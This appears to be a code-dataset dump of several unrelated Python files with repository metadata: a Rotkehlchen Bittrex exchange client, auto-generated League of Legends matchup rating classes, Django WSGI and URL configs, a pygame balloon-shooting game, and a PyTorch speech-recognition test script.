# into the Rotkehlchen way which is following the base/quote approach.
pair = trade_pair_from_assets(quote_currency, base_currency)
return pair
def world_pair_to_bittrex(pair: TradePair) -> str:
"""Turns a rotkehlchen pair to a bittrex pair"""
base_asset, quote_asset = pair_get_assets(pair)
base_asset_str = base_asset.to_bittrex()
quote_asset_str = quote_asset.to_bittrex()
# In bittrex the pairs are inverted and use '-'
return f'{quote_asset_str}-{base_asset_str}'
def trade_from_bittrex(bittrex_trade: Dict[str, Any]) -> Trade:
"""Turn a bittrex trade returned from bittrex trade history to our common trade
history format
Throws:
- UnknownAsset/UnsupportedAsset due to bittrex_pair_to_world()
- DeserializationError due to unexpected format of dict entries
- KeyError due to dict entries missing an expected entry
"""
amount = (
deserialize_asset_amount(bittrex_trade['Quantity']) -
deserialize_asset_amount(bittrex_trade['QuantityRemaining'])
)
timestamp = deserialize_timestamp_from_bittrex_date(bittrex_trade['TimeStamp'])
rate = deserialize_price(bittrex_trade['PricePerUnit'])
order_type = deserialize_trade_type(bittrex_trade['OrderType'])
bittrex_price = deserialize_price(bittrex_trade['Price'])
fee = deserialize_fee(bittrex_trade['Commission'])
pair = bittrex_pair_to_world(bittrex_trade['Exchange'])
quote_currency = get_pair_position_asset(pair, 'second')
log.debug(
'Processing bittrex Trade',
sensitive_log=True,
amount=amount,
rate=rate,
order_type=order_type,
price=bittrex_price,
fee=fee,
bittrex_pair=bittrex_trade['Exchange'],
pair=pair,
)
return Trade(
timestamp=timestamp,
location=Location.BITTREX,
pair=pair,
trade_type=order_type,
amount=amount,
rate=rate,
fee=fee,
fee_currency=quote_currency,
link=str(bittrex_trade['OrderUuid']),
)
class Bittrex(ExchangeInterface):
def __init__(
self,
api_key: ApiKey,
secret: ApiSecret,
database: 'DBHandler',
msg_aggregator: MessagesAggregator,
):
super(Bittrex, self).__init__('bittrex', api_key, secret, database)
self.apiversion = 'v1.1'
self.uri = 'https://bittrex.com/api/{}/'.format(self.apiversion)
self.msg_aggregator = msg_aggregator
def first_connection(self) -> None:
self.first_connection_made = True
def validate_api_key(self) -> Tuple[bool, str]:
try:
self.api_query('getbalance', {'currency': 'BTC'})
except ValueError as e:
error = str(e)
if error == 'APIKEY_INVALID':
return False, 'Provided API Key is invalid'
elif error == 'INVALID_SIGNATURE':
return False, 'Provided API Secret is invalid'
else:
raise
return True, ''
@overload
def api_query( # pylint: disable=unused-argument, no-self-use
self,
method: BittrexListReturnMethod,
options: Optional[Dict[str, Any]] = None,
) -> List[Dict[str, Any]]:
...
@overload # noqa: F811
def api_query( # noqa: F811 # pylint: disable=unused-argument, no-self-use
self,
method: Literal['getbalance'],
options: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
...
@overload # noqa: F811
def api_query( # noqa: F811 # pylint: disable=unused-argument, no-self-use
self,
method: str,
options: Optional[Dict[str, Any]] = None,
) -> Union[List[Dict[str, Any]], Dict[str, Any]]:
...
def api_query( # noqa: F811
self,
method: str,
options: Optional[Dict[str, Any]] = None,
) -> Union[List[Dict[str, Any]], Dict[str, Any]]:
"""
Queries Bittrex with given method and options
"""
if not options:
options = {}
nonce = str(int(time.time() * 1000))
method_type = 'public'
if method in BITTREX_MARKET_METHODS:
method_type = 'market'
elif method in BITTREX_ACCOUNT_METHODS:
method_type = 'account'
request_url = self.uri + method_type + '/' + method + '?'
if method_type != 'public':
request_url += 'apikey=' + self.api_key + "&nonce=" + nonce + '&'
request_url += urlencode(options)
signature = hmac.new(
self.secret,
request_url.encode(),
hashlib.sha512,
).hexdigest()
self.session.headers.update({'apisign': signature})
log.debug('Bittrex API query', request_url=request_url)
response = self.session.get(request_url)
if response.status_code != 200:
raise RemoteError(
f'Bittrex query responded with error status code: {response.status_code}'
f' and text: {response.text}',
)
try:
json_ret = rlk_jsonloads_dict(response.text)
except JSONDecodeError:
raise RemoteError(f'Bittrex returned invalid JSON response: {response.text}')
if json_ret['success'] is not True:
raise RemoteError(json_ret['message'])
result = json_ret['result']
assert isinstance(result, dict) or isinstance(result, list)
return result
def get_currencies(self) -> List[Dict[str, Any]]:
"""Gets a list of all currencies supported by Bittrex"""
result = self.api_query('getcurrencies')
return result
@protect_with_lock()
@cache_response_timewise()
def query_balances(self) -> Tuple[Optional[Dict[Asset, Dict[str, Any]]], str]:
try:
resp = self.api_query('getbalances')
except RemoteError as e:
msg = (
'Bittrex API request failed. Could not reach bittrex due '
'to {}'.format(e)
)
log.error(msg)
return None, msg
returned_balances = {}
for entry in resp:
try:
asset = asset_from_bittrex(entry['Currency'])
except UnsupportedAsset as e:
self.msg_aggregator.add_warning(
f'Found unsupported bittrex asset {e.asset_name}. '
f' Ignoring its balance query.',
)
continue
except UnknownAsset as e:
self.msg_aggregator.add_warning(
f'Found unknown bittrex asset {e.asset_name}. '
f' Ignoring its balance query.',
)
continue
except DeserializationError:
self.msg_aggregator.add_error(
f'Found bittrex asset with non-string type {type(entry["Currency"])}'
f' Ignoring its balance query.',
)
continue
try:
usd_price = Inquirer().find_usd_price(asset=asset)
except RemoteError as e:
self.msg_aggregator.add_error(
f'Error processing bittrex balance entry due to inability to '
f'query USD price: {str(e)}. Skipping balance entry',
)
continue
balance = {}
balance['amount'] = FVal(entry['Balance'])
balance['usd_value'] = FVal(balance['amount']) * usd_price
returned_balances[asset] = balance
log.debug(
'bittrex balance query result',
sensitive_log=True,
currency=asset,
amount=balance['amount'],
usd_value=balance['usd_value'],
)
return returned_balances, ''
def query_online_trade_history(
self,
start_ts: Timestamp,
end_ts: Timestamp,
market: Optional[TradePair] = None,
count: Optional[int] = None,
) -> List[Trade]:
options: Dict[str, Union[str, int]] = {}
if market is not None:
options['market'] = world_pair_to_bittrex(market)
if count is not None:
options['count'] = count
raw_data = self.api_query('getorderhistory', options)
log.debug('binance order history result', results_num=len(raw_data))
trades = []
for raw_trade in raw_data:
try:
trade = trade_from_bittrex(raw_trade)
except UnknownAsset as e:
self.msg_aggregator.add_warning(
f'Found bittrex trade with unknown asset '
f'{e.asset_name}. Ignoring it.',
)
continue
except UnsupportedAsset as e:
self.msg_aggregator.add_warning(
f'Found bittrex trade with unsupported asset '
f'{e.asset_name}. Ignoring it.',
)
continue
except UnprocessableTradePair as e:
self.msg_aggregator.add_error(
f'Found bittrex trade with unprocessable pair '
f'{e.pair}. Ignoring it.',
)
continue
except (DeserializationError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'Missing key entry for {msg}.'
self.msg_aggregator.add_error(
'Error processing a bittrex trade. Check logs '
'for details. Ignoring it.',
)
log.error(
'Error processing a bittrex trade',
trade=raw_trade,
error=msg,
)
continue
if trade.timestamp < start_ts or trade.timestamp > end_ts:
continue
trades.append(trade)
return trades
def _deserialize_asset_movement(self, raw_data: Dict[str, Any]) -> Optional[AssetMovement]:
"""Processes a single deposit/withdrawal from bittrex and deserializes it
Can log error/warning and return None if something went wrong at deserialization
"""
try:
if 'TxCost' in raw_data:
category = AssetMovementCategory.WITHDRAWAL
date_key = 'Opened'
fee = deserialize_fee(raw_data['TxCost'])
else:
category = AssetMovementCategory.DEPOSIT
date_key = 'LastUpdated'
fee = Fee(ZERO)
timestamp = deserialize_timestamp_from_bittrex_date(raw_data[date_key])
asset = asset_from_bittrex(raw_data['Currency'])
return AssetMovement(
location=Location.BITTREX,
category=category,
timestamp=timestamp,
asset=asset,
amount=deserialize_asset_amount(raw_data['Amount']),
fee_asset=asset,
fee=fee,
link=str(raw_data['TxId']),
)
except UnknownAsset as e:
self.msg_aggregator.add_warning(
f'Found bittrex deposit/withdrawal with unknown asset '
f'{e.asset_name}. Ignoring it.',
)
except UnsupportedAsset as e:
self.msg_aggregator.add_warning(
f'Found bittrex deposit/withdrawal with unsupported asset '
f'{e.asset_name}. Ignoring it.',
)
except (DeserializationError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'Missing key entry for {msg}.'
self.msg_aggregator.add_error(
f'Unexpected data encountered during deserialization of a bittrex '
f'asset movement. Check logs for details and open a bug report.',
)
log.error(
f'Unexpected data encountered during deserialization of bittrex '
f'asset_movement {raw_data}. Error was: {str(e)}',
)
return None
def query_online_deposits_withdrawals(
self,
start_ts: Timestamp,
end_ts: Timestamp,
) -> List[AssetMovement]:
raw_data = self.api_query('getdeposithistory')
raw_data.extend(self.api_query('getwithdrawalhistory'))
log.debug('bittrex deposit/withdrawal history result', results_num=len(raw_data))
movements = []
for raw_movement in raw_data:
movement = self._deserialize_asset_movement(raw_movement)
if movement and movement.timestamp >= start_ts and movement.timestamp <= end_ts:
movements.append(movement)
return movements
| [
"lefteris@refu.co"
] | lefteris@refu.co |
35c18252ebf33bb45574a6aac18b24612ea99638 | 98efe1aee73bd9fbec640132e6fb2e54ff444904 | /loldib/getratings/models/NA/na_ezreal/na_ezreal_top.py | 9d3af100a74aaa3bca56f5bd36d826514b917710 | [
"Apache-2.0"
] | permissive | koliupy/loldib | be4a1702c26546d6ae1b4a14943a416f73171718 | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | refs/heads/master | 2021-07-04T03:34:43.615423 | 2017-09-21T15:44:10 | 2017-09-21T15:44:10 | 104,359,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,545 | py | from getratings.models.ratings import Ratings
# Auto-generated matchup rating classes for Ezreal played Top lane on the NA
# region: one empty subclass of `Ratings` per opposing champion, named
# `NA_Ezreal_Top_<OpponentChampion>`.
#
# The classes intentionally contain no body — each declaration exists only to
# register a distinct named type for its (region, champion, role, opponent)
# combination.  NOTE(review): `Ratings` comes from the project-local
# `getratings.models.ratings` module and presumably carries model/metaclass
# behavior that is triggered by the class statement itself (e.g. ORM table or
# registry binding keyed on the class name) — confirm before restructuring
# these declarations (for instance into a generation loop), as dynamic class
# creation could bypass that registration.
class NA_Ezreal_Top_Aatrox(Ratings):
    pass
class NA_Ezreal_Top_Ahri(Ratings):
    pass
class NA_Ezreal_Top_Akali(Ratings):
    pass
class NA_Ezreal_Top_Alistar(Ratings):
    pass
class NA_Ezreal_Top_Amumu(Ratings):
    pass
class NA_Ezreal_Top_Anivia(Ratings):
    pass
class NA_Ezreal_Top_Annie(Ratings):
    pass
class NA_Ezreal_Top_Ashe(Ratings):
    pass
class NA_Ezreal_Top_AurelionSol(Ratings):
    pass
class NA_Ezreal_Top_Azir(Ratings):
    pass
class NA_Ezreal_Top_Bard(Ratings):
    pass
class NA_Ezreal_Top_Blitzcrank(Ratings):
    pass
class NA_Ezreal_Top_Brand(Ratings):
    pass
class NA_Ezreal_Top_Braum(Ratings):
    pass
class NA_Ezreal_Top_Caitlyn(Ratings):
    pass
class NA_Ezreal_Top_Camille(Ratings):
    pass
class NA_Ezreal_Top_Cassiopeia(Ratings):
    pass
class NA_Ezreal_Top_Chogath(Ratings):
    pass
class NA_Ezreal_Top_Corki(Ratings):
    pass
class NA_Ezreal_Top_Darius(Ratings):
    pass
class NA_Ezreal_Top_Diana(Ratings):
    pass
class NA_Ezreal_Top_Draven(Ratings):
    pass
class NA_Ezreal_Top_DrMundo(Ratings):
    pass
class NA_Ezreal_Top_Ekko(Ratings):
    pass
class NA_Ezreal_Top_Elise(Ratings):
    pass
class NA_Ezreal_Top_Evelynn(Ratings):
    pass
class NA_Ezreal_Top_Ezreal(Ratings):
    pass
class NA_Ezreal_Top_Fiddlesticks(Ratings):
    pass
class NA_Ezreal_Top_Fiora(Ratings):
    pass
class NA_Ezreal_Top_Fizz(Ratings):
    pass
class NA_Ezreal_Top_Galio(Ratings):
    pass
class NA_Ezreal_Top_Gangplank(Ratings):
    pass
class NA_Ezreal_Top_Garen(Ratings):
    pass
class NA_Ezreal_Top_Gnar(Ratings):
    pass
class NA_Ezreal_Top_Gragas(Ratings):
    pass
class NA_Ezreal_Top_Graves(Ratings):
    pass
class NA_Ezreal_Top_Hecarim(Ratings):
    pass
class NA_Ezreal_Top_Heimerdinger(Ratings):
    pass
class NA_Ezreal_Top_Illaoi(Ratings):
    pass
class NA_Ezreal_Top_Irelia(Ratings):
    pass
class NA_Ezreal_Top_Ivern(Ratings):
    pass
class NA_Ezreal_Top_Janna(Ratings):
    pass
class NA_Ezreal_Top_JarvanIV(Ratings):
    pass
class NA_Ezreal_Top_Jax(Ratings):
    pass
class NA_Ezreal_Top_Jayce(Ratings):
    pass
class NA_Ezreal_Top_Jhin(Ratings):
    pass
class NA_Ezreal_Top_Jinx(Ratings):
    pass
class NA_Ezreal_Top_Kalista(Ratings):
    pass
class NA_Ezreal_Top_Karma(Ratings):
    pass
class NA_Ezreal_Top_Karthus(Ratings):
    pass
class NA_Ezreal_Top_Kassadin(Ratings):
    pass
class NA_Ezreal_Top_Katarina(Ratings):
    pass
class NA_Ezreal_Top_Kayle(Ratings):
    pass
class NA_Ezreal_Top_Kayn(Ratings):
    pass
class NA_Ezreal_Top_Kennen(Ratings):
    pass
class NA_Ezreal_Top_Khazix(Ratings):
    pass
class NA_Ezreal_Top_Kindred(Ratings):
    pass
class NA_Ezreal_Top_Kled(Ratings):
    pass
class NA_Ezreal_Top_KogMaw(Ratings):
    pass
class NA_Ezreal_Top_Leblanc(Ratings):
    pass
class NA_Ezreal_Top_LeeSin(Ratings):
    pass
class NA_Ezreal_Top_Leona(Ratings):
    pass
class NA_Ezreal_Top_Lissandra(Ratings):
    pass
class NA_Ezreal_Top_Lucian(Ratings):
    pass
class NA_Ezreal_Top_Lulu(Ratings):
    pass
class NA_Ezreal_Top_Lux(Ratings):
    pass
class NA_Ezreal_Top_Malphite(Ratings):
    pass
class NA_Ezreal_Top_Malzahar(Ratings):
    pass
class NA_Ezreal_Top_Maokai(Ratings):
    pass
class NA_Ezreal_Top_MasterYi(Ratings):
    pass
class NA_Ezreal_Top_MissFortune(Ratings):
    pass
class NA_Ezreal_Top_MonkeyKing(Ratings):
    pass
class NA_Ezreal_Top_Mordekaiser(Ratings):
    pass
class NA_Ezreal_Top_Morgana(Ratings):
    pass
class NA_Ezreal_Top_Nami(Ratings):
    pass
class NA_Ezreal_Top_Nasus(Ratings):
    pass
class NA_Ezreal_Top_Nautilus(Ratings):
    pass
class NA_Ezreal_Top_Nidalee(Ratings):
    pass
class NA_Ezreal_Top_Nocturne(Ratings):
    pass
class NA_Ezreal_Top_Nunu(Ratings):
    pass
class NA_Ezreal_Top_Olaf(Ratings):
    pass
class NA_Ezreal_Top_Orianna(Ratings):
    pass
class NA_Ezreal_Top_Ornn(Ratings):
    pass
class NA_Ezreal_Top_Pantheon(Ratings):
    pass
class NA_Ezreal_Top_Poppy(Ratings):
    pass
class NA_Ezreal_Top_Quinn(Ratings):
    pass
class NA_Ezreal_Top_Rakan(Ratings):
    pass
class NA_Ezreal_Top_Rammus(Ratings):
    pass
class NA_Ezreal_Top_RekSai(Ratings):
    pass
class NA_Ezreal_Top_Renekton(Ratings):
    pass
class NA_Ezreal_Top_Rengar(Ratings):
    pass
class NA_Ezreal_Top_Riven(Ratings):
    pass
class NA_Ezreal_Top_Rumble(Ratings):
    pass
class NA_Ezreal_Top_Ryze(Ratings):
    pass
class NA_Ezreal_Top_Sejuani(Ratings):
    pass
class NA_Ezreal_Top_Shaco(Ratings):
    pass
class NA_Ezreal_Top_Shen(Ratings):
    pass
class NA_Ezreal_Top_Shyvana(Ratings):
    pass
class NA_Ezreal_Top_Singed(Ratings):
    pass
class NA_Ezreal_Top_Sion(Ratings):
    pass
class NA_Ezreal_Top_Sivir(Ratings):
    pass
class NA_Ezreal_Top_Skarner(Ratings):
    pass
class NA_Ezreal_Top_Sona(Ratings):
    pass
class NA_Ezreal_Top_Soraka(Ratings):
    pass
class NA_Ezreal_Top_Swain(Ratings):
    pass
class NA_Ezreal_Top_Syndra(Ratings):
    pass
class NA_Ezreal_Top_TahmKench(Ratings):
    pass
class NA_Ezreal_Top_Taliyah(Ratings):
    pass
class NA_Ezreal_Top_Talon(Ratings):
    pass
class NA_Ezreal_Top_Taric(Ratings):
    pass
class NA_Ezreal_Top_Teemo(Ratings):
    pass
class NA_Ezreal_Top_Thresh(Ratings):
    pass
class NA_Ezreal_Top_Tristana(Ratings):
    pass
class NA_Ezreal_Top_Trundle(Ratings):
    pass
class NA_Ezreal_Top_Tryndamere(Ratings):
pass
class NA_Ezreal_Top_TwistedFate(Ratings):
pass
class NA_Ezreal_Top_Twitch(Ratings):
pass
class NA_Ezreal_Top_Udyr(Ratings):
pass
class NA_Ezreal_Top_Urgot(Ratings):
pass
class NA_Ezreal_Top_Varus(Ratings):
pass
class NA_Ezreal_Top_Vayne(Ratings):
pass
class NA_Ezreal_Top_Veigar(Ratings):
pass
class NA_Ezreal_Top_Velkoz(Ratings):
pass
class NA_Ezreal_Top_Vi(Ratings):
pass
class NA_Ezreal_Top_Viktor(Ratings):
pass
class NA_Ezreal_Top_Vladimir(Ratings):
pass
class NA_Ezreal_Top_Volibear(Ratings):
pass
class NA_Ezreal_Top_Warwick(Ratings):
pass
class NA_Ezreal_Top_Xayah(Ratings):
pass
class NA_Ezreal_Top_Xerath(Ratings):
pass
class NA_Ezreal_Top_XinZhao(Ratings):
pass
class NA_Ezreal_Top_Yasuo(Ratings):
pass
class NA_Ezreal_Top_Yorick(Ratings):
pass
class NA_Ezreal_Top_Zac(Ratings):
pass
class NA_Ezreal_Top_Zed(Ratings):
pass
class NA_Ezreal_Top_Ziggs(Ratings):
pass
class NA_Ezreal_Top_Zilean(Ratings):
pass
class NA_Ezreal_Top_Zyra(Ratings):
pass
| [
"noreply@github.com"
] | koliupy.noreply@github.com |
fa6b15f117b246dbe03e912ac23fd06353222949 | a94e5ef77b7510b34885de07a4a9779abd46f804 | /mishipay_social_app/mishipay_social_app/wsgi.py | a695684996139bbc438e87c07ce777c75b9f714d | [] | no_license | shubham-kumar/mishipay | e05714508e7c9b5a0e5d8eb82b0d7f7e05654ed2 | 86beb0532637d4b18b326d1d1d2af55f4ce4e3ad | refs/heads/master | 2020-08-21T14:37:18.692527 | 2019-10-19T09:35:56 | 2019-10-19T09:35:56 | 216,181,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | """
WSGI config for mishipay_social_app project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mishipay_social_app.settings')
application = get_wsgi_application()
| [
"shubham.kumar@autodesk.com"
] | shubham.kumar@autodesk.com |
c66f64e3cdef0df7c0c6fea5459b75f5b42961cf | c17374a533fd7f21be10ef2077e261849ed87c7e | /electoraid_cms/urls.py | e8e35769590ed4bab0662190aff56da33362675d | [] | no_license | electoraid/electoraid-cms | cf8a6f9ebf6951625c202ff8b9e2c3ad72f528ae | 8a11b4b7b6d9eadf283af0725a57710eddffe216 | refs/heads/master | 2022-12-12T13:47:02.793891 | 2019-12-04T02:25:09 | 2019-12-04T02:25:09 | 223,650,774 | 0 | 0 | null | 2022-12-08T03:15:57 | 2019-11-23T20:45:38 | Python | UTF-8 | Python | false | false | 967 | py | """electoraid_cms URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from baton.autodiscover import admin
from django.urls import include, path
from django.views.generic.base import RedirectView
from django.views.decorators.csrf import csrf_exempt
urlpatterns = [
path('admin/', admin.site.urls),
path('baton/', include('baton.urls')),
path('', RedirectView.as_view(url='/admin')),
]
| [
"davideads@gmail.com"
] | davideads@gmail.com |
48c6437c06998d4e83c780d0c0e2e77800e63df4 | a259121f6b1ea79bd14ba969145093189d78089a | /pygame_project/collision.py | 311d6eabd09e87c797489816cd7e8045123fec45 | [] | no_license | onerain92/makingClassicGame | acb7b97f1548bbf35135913c7dfaa93f1059a32c | 49ee59a27bea9d8244d927687785c8e5a19c3022 | refs/heads/main | 2022-12-24T22:04:34.749553 | 2020-10-10T04:02:55 | 2020-10-10T04:02:55 | 301,774,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,140 | py | import pygame
import os
######################################################################
# 기본 초기화
pygame.init()
screen_width = 640
screen_height = 480
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption("공뿌시기")
clock = pygame.time.Clock()
######################################################################
# 1. 사용자 게임 초기화(배경 화면, 게임 이미지, 좌표, 속도, 폰트 등)
current_path = os.path.dirname(__file__) # 현재 파일의 위치 반환
image_path = os.path.join(current_path, "images") # images 폴더 위치 반환
# 배경 만들기
background = pygame.image.load(os.path.join(image_path, "background.png"))
# 스테이지 만들기
stage = pygame.image.load(os.path.join(image_path, "stage.png"))
stage_size = stage.get_rect().size
stage_height = stage_size[1] # 스테이지의 높이 위에 캐릭터를 두기 위해
# 캐릭터 만들기
character = pygame.image.load(os.path.join(image_path, "character.png"))
character_size = character.get_rect().size
character_width = character_size[0] # 스테이지의 높이 위에 캐릭터를 두기 위해
character_height = character_size[1] # 스테이지의 높이 위에 캐릭터를 두기 위해
character_x_pos = (screen_width / 2) - (character_width / 2)
character_y_pos = screen_height - character_height - stage_height
# 캐릭터 이동 방향
character_to_x = 0
# 캐릭터 이동 속도
character_speed = 5
# 무기 만들기
weapon = pygame.image.load(os.path.join(image_path, "weapon.png"))
weapon_size = weapon.get_rect().size
weapon_width = weapon_size[0]
# 무기는 한 번에 여러발 발사 가능
weapons = []
# 무기 이동 속도
weapon_speed = 10
# 공 만들기( 4개 크기에 대해 따로 처리 )
ball_images = [
pygame.image.load(os.path.join(image_path, "balloon1.png")),
pygame.image.load(os.path.join(image_path, "balloon2.png")),
pygame.image.load(os.path.join(image_path, "balloon3.png")),
pygame.image.load(os.path.join(image_path, "balloon4.png"))
]
# 공 크기에 따른 최초 스피드
ball_speed_y = [-18, -15, -12, -9] # index 0, 1, 2, 3에 해당하는 값
# 공들
balls = []
# 최초 발생하는 큰 공 추가
balls.append({
"pos_x": 50, # 공의 x 좌표
"pos_y": 50, # 공의 y 좌표
"img_idx": 0, # 공의 이미지 인덱스
"to_x": 3, # 공의 x축 이동방향, -3이면 왼쪽으로, 3이면 오른쪽으로 이동
"to_y": -6, # 공의y축 이동방향
"init_spd_y": ball_speed_y[0] # y 최초 속도
})
# 사라질 무기, 공 정보 저장 변수
weapon_to_remove = -1
ball_to_remove = -1
running = True
while running:
dt = clock.tick(30)
# 2. 이벤트 처리 (키보드, 마우스 등)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT: # 캐릭터를 왼쪽으로
character_to_x -= character_speed
elif event.key == pygame.K_RIGHT: # 캐릭터를 왼쪽으로
character_to_x += character_speed
elif event.key == pygame.K_SPACE: # 캐릭터를 왼쪽으로
weapon_x_pos = character_x_pos + \
(character_width / 2) - (weapon_width / 2)
weapon_y_pos = character_y_pos
weapons.append([weapon_x_pos, weapon_y_pos])
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT: # 캐릭터를 왼쪽으로
character_to_x = 0
# 3. 게임 캐릭터 위치 정의
character_x_pos += character_to_x
if character_x_pos < 0:
character_x_pos = 0
elif character_x_pos > screen_width - character_width:
character_x_pos = screen_width - character_width
# 무기 위치 조정
weapons = [[w[0], w[1] - weapon_speed] for w in weapons] # 무기 위치를 위로
# 천장에 닿은 무기 없애기
weapons = [[w[0], w[1]] for w in weapons if w[1] > 0]
# 공 위치 정의
for ball_idx, ball_val in enumerate(balls):
ball_pos_x = ball_val["pos_x"]
ball_pos_y = ball_val["pos_y"]
ball_img_idx = ball_val["img_idx"]
ball_size = ball_images[ball_img_idx].get_rect().size
ball_width = ball_size[0]
ball_height = ball_size[1]
# 가로벽에 닿았을 때 공 이동 위치 변경( 튕겨 나오는 효과 )
if ball_pos_x < 0 or ball_pos_x > screen_width - ball_width:
ball_val["to_x"] = ball_val["to_x"] * -1
# 세로 위치
# 스테이지에 튕겨서 올라가는 처리
if ball_pos_y >= screen_height - stage_height - ball_height:
ball_val["to_y"] = ball_val["init_spd_y"]
else: # 그 외의 모든 경우에는 속도를 증가
ball_val["to_y"] += 0.5
ball_val["pos_x"] += ball_val["to_x"]
ball_val["pos_y"] += ball_val["to_y"]
# 4. 충돌 처리
# 캐릭터 rect 정보 업데이트
character_rect = character.get_rect()
character_rect.left = character_x_pos
character_rect.top = character_y_pos
for ball_idx, ball_val in enumerate(balls):
ball_pos_x = ball_val["pos_x"]
ball_pos_y = ball_val["pos_y"]
ball_img_idx = ball_val["img_idx"]
# 공 rect 정보 업데이트
ball_rect = ball_images[ball_img_idx].get_rect()
ball_rect.left = ball_pos_x
ball_rect.top = ball_pos_y
# 공과 캐릭터 충돌 처리
if character_rect.colliderect(ball_rect):
running = False
break
# 공과 무기들 충돌 처리
for weapon_idx, weapon_val in enumerate(weapons):
weapon_pos_x = weapon_val[0]
weapon_pos_y = weapon_val[1]
# 무기 rect 정보 업데이트
weapon_rect = weapon.get_rect()
weapon_rect.left = weapon_pos_x
weapon_rect.top = weapon_pos_y
# 충돌 체크
if weapon_rect.colliderect(ball_rect):
weapon_to_remove = weapon_idx # 해당 무기 없애기 위한 값 설정
ball_to_remove = ball_idx # 해당 공 없애기 위한 값 설정
break
# 충돌된 공 or 무기 없애기
if ball_to_remove > -1:
del balls[ball_to_remove]
ball_to_remove = -1
if weapon_to_remove > -1:
del weapons[weapon_to_remove]
weapon_to_remove = -1
# 5. 화면에 그리기
screen.blit(background, (0, 0))
for weapon_x_pos, weapon_y_pos in weapons:
screen.blit(weapon, (weapon_x_pos, weapon_y_pos))
for idx, val in enumerate(balls):
ball_pos_x = val["pos_x"]
ball_pos_y = val["pos_y"]
ball_img_idx = val["img_idx"]
screen.blit(ball_images[ball_img_idx], (ball_pos_x, ball_pos_y))
screen.blit(stage, (0, screen_height - stage_height))
screen.blit(character, (character_x_pos, character_y_pos))
pygame.display.update()
pygame.quit()
| [
"ted@mobidoo.co.kr"
] | ted@mobidoo.co.kr |
b6e455cb0f1da3debf57a57e34f1365a6e7625f6 | 7a78dc9efe7be5176407e3791e8626fd6e5720c4 | /test.py | c6f792a2d76a7ccad6e2c05dd0c2f1580c3e54e8 | [
"MIT"
] | permissive | JerryJack121/Speech_Recognition-PyTorch | 1734ed4b8e6587de5555ec56280f4df6954f199d | da7ba30b9905e8e7a8341fdb14250650a060812b | refs/heads/main | 2023-02-20T00:53:17.963023 | 2021-01-23T09:53:00 | 2021-01-23T09:53:00 | 331,284,318 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,397 | py | import torch
import torchaudio
import torch.nn as nn
from torch.utils import data
import torch.optim as optim
from nets.model import SpeechRecognitionModel
from comet_ml import Experiment
from utils.processing import TextTransform, data_processing, GreedyDecoder
import os
import torch.nn.functional as F
from utils.wer import levenshtein_distance as wer
from tqdm import tqdm
import time
import math
from audio_dataloader import Aduio_DataLoader
import matplotlib.pyplot as plt
import pandas as pd
if torch.cuda.is_available():
device = torch.device('cuda')
torch.backends.cudnn.benchmark = True
torch.cuda.empty_cache()
else:
device = torch.device('cpu')
hparams = {
"n_cnn_layers": 3,
"n_rnn_layers": 7,
"rnn_dim": 512*2,
"n_class": 29,
"n_feats": 128,
"stride": 2,
"dropout": 0,
"batch_size": 1,
}
model = SpeechRecognitionModel(hparams['n_cnn_layers'],
hparams['n_rnn_layers'], hparams['rnn_dim'],
hparams['n_class'], hparams['n_feats'],
hparams['stride'],
hparams['dropout']).to(device)
model.load_state_dict(
torch.load(r'./weights/transfer_rnn7-rnndim1024-drop0.1/epoch4-val_loss0.0002-avg_wer0.0365.pth'))
test_dataset = Aduio_DataLoader(
r'D:\dataset\ntut-ml-2020-taiwanese-e2e\test-shuf')
test_loader = data.DataLoader(dataset=test_dataset,
batch_size=hparams['batch_size'],
shuffle=False,
collate_fn=lambda x: data_processing(x, 'test'),
num_workers=0,
pin_memory=True)
test_data_len = len(test_loader.dataset)
test_epoch_size = math.ceil(test_data_len / hparams['batch_size'])
start_time = time.time()
file_list, pred_list = [], []
with tqdm(total=test_epoch_size, desc='test', postfix=dict,
mininterval=0.3) as pbar:
with torch.no_grad():
for I, _data in enumerate(test_loader):
spectrograms, labels, input_lengths, label_lengths, filename = _data
spectrograms, labels = spectrograms.to(device), labels.to(device)
output = model(spectrograms) # (batch, time, n_class)
output = F.log_softmax(output, dim=2)
output = output.transpose(0, 1) # (time, batch, n_class)
decoded_preds, decoded_targets = GreedyDecoder(
output.transpose(0, 1),
labels.cpu().numpy().astype(int), label_lengths)
pred = decoded_preds[0].replace("'", " ").strip() #刪除前後的空格
file_list.append(filename)
pred_list.append(pred)
waste_time = time.time() - start_time
pbar.set_postfix(**{'step/s': waste_time})
pbar.update(1)
id_path = r'D:\dataset\ntut-ml-2020-taiwanese-e2e\sample.csv'
save_path = r'D:\dataset\ntut-ml-2020-taiwanese-e2e\results\test.csv'
dictionary = {'id': file_list[:], 'text': pred_list[:]}
final_file_list, final_pred_list = [], []
for i in range(len(file_list)):
final_file_list.append(i + 1)
location = file_list.index(str(i + 1))
final_pred_list.append(str(dictionary.get('text')[location]))
my_submission = pd.DataFrame({
'id': final_file_list[:],
'text': final_pred_list[:]
})
my_submission.to_csv(save_path, index=False) | [
"73692359+JerryJack121@users.noreply.github.com"
] | 73692359+JerryJack121@users.noreply.github.com |
